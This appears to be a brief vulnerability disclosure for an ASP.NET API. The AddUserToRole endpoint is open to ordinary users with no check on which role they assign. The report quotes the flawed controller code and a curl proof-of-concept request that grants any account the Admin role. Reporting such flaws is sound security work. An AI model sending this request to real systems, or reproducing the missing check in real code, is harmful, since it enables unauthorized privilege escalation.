Improper access to an API endpointAddUserToRole
can allow a regular user to escalate his privileges to be an admin
[Authorize(Roles = Roles.User)]
[HttpPost]
public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
{
var results = await _auth.AddUserToRoleAsync(username, role);
if (!results.IsSuccess)
return BadRequest(results);
return Ok(results);
}
As seen it just allows a user role to access this endpoint and no proper checks for what role can be added So it can be an admin role
curl -X 'POST' \
'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
-H 'accept: */*' \
-H 'Authorization: <TOKEN>' \
-d ''